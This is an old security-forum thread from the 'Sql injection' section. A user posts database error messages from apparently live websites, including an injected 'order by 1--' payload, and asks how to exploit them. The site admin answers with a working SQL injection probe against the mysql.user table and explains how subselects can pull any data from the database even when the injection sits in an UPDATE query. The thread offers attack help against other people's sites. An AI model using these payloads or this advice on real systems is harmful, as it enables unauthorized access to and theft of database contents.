|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Warning mysql Error ? |
|
Posted: Wed Feb 06, 2008 12:36 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
___________________________________
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /site.com/htdocs/news/detail.php on line 13
the news was no longer exists
___________________________________
Erreur de base de donn饠: Invalid SQL: Update news Set hit = hit+ 1 Where idnews = -1 order by 1--
Erreur interne : 1054 (Unknown column '1' in 'order clause')
Session halted.
____________________________________
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/itcan/www/fonctionsgl.php on line 27
résultats dans cette recherche
--------------------------------------------------------------------------------
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/itcan/www/fonctionsgl.php on line 87
________________________________
How i can exploiter this Error ? |
|
|
|
|
|
|
|
|
Posted: Wed Feb 06, 2008 1:12 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Code: |
id=15+AND+(SELECT+COUNT(*)+FROM+mysql.user)>0+
|
If mysql version is < 4.1.x, then syntax error will show up, if version is ok, but current mysql user does not have needed privileges, then error message is "access denied". And if no error message - then you have access to mysql users table. So via Subselects functionality you are able to fetch any data from database even if sql injecion is located in UPDATE clause. Still, you need custom written script or some sql injection tool for automatization. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|